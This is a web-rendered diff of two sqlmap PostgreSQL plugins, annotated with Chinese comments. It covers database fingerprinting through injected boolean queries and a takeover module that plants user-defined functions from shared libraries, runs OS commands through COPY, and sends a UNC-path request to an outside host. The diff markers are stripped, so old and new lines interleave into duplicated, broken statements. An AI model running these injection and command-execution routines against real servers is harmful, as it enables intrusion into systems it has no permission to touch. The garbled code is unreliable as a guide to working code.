wsOsFp = Format.getOs("web server", kb.headersFp)
# 9. 将 Web 服务器操作系统指纹添加到输出
if wsOsFp:
value += "%s\n" % wsOsFp
value += "%s\
" % wsOsFp
# 10. 如果有数据库 Banner 信息
if kb.data.banner:
# 11. 获取后端数据库操作系统指纹
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
# 12. 将后端数据库操作系统指纹添加到输出
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
value += "%s\
" % dbmsOsFp
value += "back-end DBMS: "
# 13. 如果不是详细指纹,则返回数据库类型和分支信息
if not conf.extensiveFp:
value += DBMS.PGSQL
if fork:
value += " (%s fork)" % fork
return value
# 14. 获取活动的指纹信息
actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
# 15. 如果有 Banner 解析指纹
if kb.bannerFp:
banVer = kb.bannerFp.get("dbmsVersion")
# 16. 如果有 Banner 版本号
if banVer:
# 17. 格式化 Banner 版本号
banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer)
# 18. 获取 HTML 错误指纹
htmlErrorFp = Format.getErrorParsedDBMSes()
# 19. 将 HTML 错误指纹添加到输出
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
# 20. 如果有数据库分支信息,则将其添加到输出
if fork:
value += "\n%sfork fingerprint: %s" % (blank, fork)
# 21. 返回完整的指纹信息
return value
# 22. 检查数据库类型是否为 PostgreSQL
def checkDbms(self):
"""
References for fingerprint:
* https://www.postgresql.org/docs/current/static/release.html
"""
# 23. 如果不是详细指纹,且当前数据库类型属于 PostgreSQL 别名,则设置数据库类型为 PostgreSQL 并返回 True
if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES):
setDbms(DBMS.PGSQL)
self.getBanner()
return True
# 24. 输出正在测试的数据库类型
infoMsg = "testing %s" % DBMS.PGSQL
logger.info(infoMsg)
# NOTE: Vertica works too without the CONVERT_TO()
# 25. 执行 SQL 查询,检查数据库类型是否为 PostgreSQL (基于 CONVERT_TO 和 QUOTE_IDENT 函数)
result = inject.checkBooleanExpression("CONVERT_TO('[RANDSTR]', QUOTE_IDENT(NULL)) IS NULL")
# 26. 如果查询成功
if result:
# 27. 输出确认信息
infoMsg = "confirming %s" % DBMS.PGSQL
logger.info(infoMsg)
# 28. 执行 SQL 查询,再次确认数据库类型是否为 PostgreSQL (基于 COALESCE 函数)
result = inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]")
# 29. 如果再次确认失败,则输出警告信息,并返回 False
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warning(warnMsg)
return False
# 30. 设置数据库类型为 PostgreSQL
setDbms(DBMS.PGSQL)
# 31. 获取数据库 Banner 信息
self.getBanner()
# 32. 如果不是详细指纹,则返回 True
if not conf.extensiveFp:
return True
# 33. 输出正在进行详细指纹识别
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg)
# 34. 通过检查不同版本的函数,设置 PostgreSQL 版本
if inject.checkBooleanExpression("RANDOM_NORMAL(0.0, 1.0) IS NOT NULL"):
Backend.setVersion(">= 16.0")
elif inject.checkBooleanExpression("REGEXP_COUNT(NULL,NULL) IS NULL"):
@ -193,39 +216,43 @@ class Fingerprint(GenericFingerprint):
Backend.setVersion("< 6.2.0")
return True
# 35. 如果第一次查询失败,则输出警告信息,并返回 False
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warning(warnMsg)
return False
# 36. 检查数据库服务器的操作系统
def checkDbmsOs(self, detailed=False):
# 37. 如果已经获取到操作系统信息,则直接返回
if Backend.getOs():
return
# 38. 输出正在进行操作系统指纹识别
infoMsg = "fingerprinting the back-end DBMS operating system"
logger.info(infoMsg)
# 39. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "character(10000)")
# 40. 将 VERSION() 的结果插入到支持表中
inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "VERSION()"))
# 41. 定义 Windows 操作系统特有的关键字
# Windows executables should always have ' Visual C++' or ' mingw'
# patterns within the banner
osWindows = (" Visual C++", "mingw")
# 42. 循环检查是否存在 Windows 操作系统关键字
for osPattern in osWindows:
query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField)
query += "LIKE '%" + osPattern + "%')>0"
# 43. 如果存在 Windows 操作系统关键字,则设置操作系统为 Windows
if inject.checkBooleanExpression(query):
Backend.setOs(OS.WINDOWS)
break
# 44. 如果没有检测到 Windows 操作系统,则设置操作系统为 Linux
if Backend.getOs() is None:
Backend.setOs(OS.LINUX)
# 45. 输出检测到的操作系统信息
infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
logger.info(infoMsg)
self.cleanup(onlyFileTbl=True)
# 46. 清理支持表
self.cleanup(onlyFileTbl=True)

@ -5,101 +5,115 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import os
from lib.core.common import Backend
from lib.core.common import checkFile
from lib.core.common import decloakToTemp
from lib.core.common import flattenValue
from lib.core.common import filterNone
from lib.core.common import isListLike
from lib.core.common import isNoneValue
from lib.core.common import isStackingAvailable
from lib.core.common import randomStr
from lib.core.compat import LooseVersion
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import OS
from lib.core.exception import SqlmapSystemException
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject
from plugins.generic.takeover import Takeover as GenericTakeover
# 1. 导入所需的模块
import os # 操作系统相关功能
from lib.core.common import Backend # 后端数据库信息
from lib.core.common import checkFile # 检查文件是否存在
from lib.core.common import decloakToTemp # 解密临时文件路径
from lib.core.common import flattenValue # 将嵌套列表展平
from lib.core.common import filterNone # 过滤列表中的 None 值
from lib.core.common import isListLike # 检查是否为列表类型
from lib.core.common import isNoneValue # 检查是否为 None 值
from lib.core.common import isStackingAvailable # 检查是否支持堆叠查询
from lib.core.common import randomStr # 生成随机字符串
from lib.core.compat import LooseVersion # 版本比较
from lib.core.data import kb # 全局知识库
from lib.core.data import logger # 日志记录器
from lib.core.data import paths # 路径相关信息
from lib.core.enums import OS # 操作系统枚举
from lib.core.exception import SqlmapSystemException # 系统异常
from lib.core.exception import SqlmapUnsupportedFeatureException # 不支持的特性异常
from lib.request import inject # 注入相关函数
from plugins.generic.takeover import Takeover as GenericTakeover # 通用提权类
# 2. 定义一个类 Takeover继承自 GenericTakeover
class Takeover(GenericTakeover):
# 3. 设置远程 UDF 文件路径
def udfSetRemotePath(self):
# On Windows
# 4. 如果是 Windows 系统
if Backend.isOs(OS.WINDOWS):
# The DLL can be in any folder where postgres user has
# read/write/execute access is valid
# NOTE: by not specifing any path, it will save into the
# data directory, on PostgreSQL 8.3 it is
# C:\Program Files\PostgreSQL\8.3\data.
# 5. UDF 文件可以放在任何 PostgreSQL 用户具有读/写/执行权限的目录
# 注意:不指定路径将保存在数据目录中
# 在 PostgreSQL 8.3 中默认路径为C:\Program Files\PostgreSQL\8.3\data
self.udfRemoteFile = "%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt)
# On Linux
# 6. 如果是 Linux 系统
else:
# The SO can be in any folder where postgres user has
# read/write/execute access is valid
# 7. SO 文件可以放在任何 PostgreSQL 用户具有读/写/执行权限的目录
self.udfRemoteFile = "/tmp/%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt)
# 8. 设置本地 UDF 文件路径
def udfSetLocalPaths(self):
# 9. 设置 UDF 本地文件路径和共享库名称
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
# 10. 从 Banner 信息中获取数据库版本
self.getVersionFromBanner()
banVer = kb.bannerFp["dbmsVersion"]
# 11. 如果没有数据库版本信息,或者版本号不是数字开头,则抛出异常
if not banVer or not banVer[0].isdigit():
errMsg = "unsupported feature on unknown version of PostgreSQL"
raise SqlmapUnsupportedFeatureException(errMsg)
# 12. 如果数据库版本大于等于 10则取主版本号
elif LooseVersion(banVer) >= LooseVersion("10"):
majorVer = banVer.split('.')[0]
# 13. 如果数据库版本大于等于 8.2,则取主版本号和小版本号
elif LooseVersion(banVer) >= LooseVersion("8.2") and '.' in banVer:
majorVer = '.'.join(banVer.split('.')[:2])
# 14. 如果数据库版本小于 8.2,则抛出异常
else:
errMsg = "unsupported feature on versions of PostgreSQL before 8.2"
raise SqlmapUnsupportedFeatureException(errMsg)
# 15. 尝试获取 UDF 文件
try:
# 16. 如果是 Windows 系统
if Backend.isOs(OS.WINDOWS):
_ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_")
checkFile(_)
self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "dll"
# 17. 如果是 Linux 系统
else:
_ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_")
checkFile(_)
self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "so"
# 18. 如果找不到 UDF 文件,则抛出异常
except SqlmapSystemException:
errMsg = "unsupported feature on PostgreSQL %s (%s-bit)" % (majorVer, Backend.getArch())
raise SqlmapUnsupportedFeatureException(errMsg)
# 19. 从共享库创建 UDF
def udfCreateFromSharedLib(self, udf, inpRet):
# 20. 如果需要创建 UDF
if udf in self.udfToCreate:
logger.info("creating UDF '%s' from the binary UDF file" % udf)
inp = ", ".join(i for i in inpRet["input"])
ret = inpRet["return"]
# Reference: http://www.postgresql.org/docs/8.3/interactive/sql-createfunction.html
# 21. 创建 UDF 的 SQL 语句
# Reference: http://www.postgresql.org/docs/8.3/interactive/sql-createfunction.html
inject.goStacked("DROP FUNCTION %s(%s)" % (udf, inp))
inject.goStacked("CREATE OR REPLACE FUNCTION %s(%s) RETURNS %s AS '%s', '%s' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE" % (udf, inp, ret, self.udfRemoteFile, udf))
self.createdUdf.add(udf)
# 22. 如果不需要创建 UDF
else:
logger.debug("keeping existing UDF '%s' as requested" % udf)
# 23. 发送 UNC 路径请求
def uncPathRequest(self):
# 24. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "text")
# 25. 执行 COPY 命令,发送 UNC 路径请求
inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True)
# 26. 清理支持表
self.cleanup(onlyFileTbl=True)
# 27. 执行系统命令,并返回输出
def copyExecCmd(self, cmd):
output = None
# 28. 如果支持堆叠查询
if isStackingAvailable():
# Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
@ -109,21 +123,17 @@ class Takeover(GenericTakeover):
query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
output = inject.getValue(query, resumeValue=False)
if isListLike(output):
output = flattenValue(output)
output = filterNone(output)
if not isNoneValue(output):
output = os.linesep.join(output)
self._cleanupCmd = "DROP TABLE %s" % self.cmdTblName
inject.goStacked(self._cleanupCmd)
return output
# 29. 检查是否支持 COPY 命令执行系统命令
def checkCopyExec(self):
if kb.copyExecTest is None:
kb.copyExecTest = self.copyExecCmd("echo 1") == '1'
return kb.copyExecTest
return kb.copyExecTest
Loading…
Cancel
Save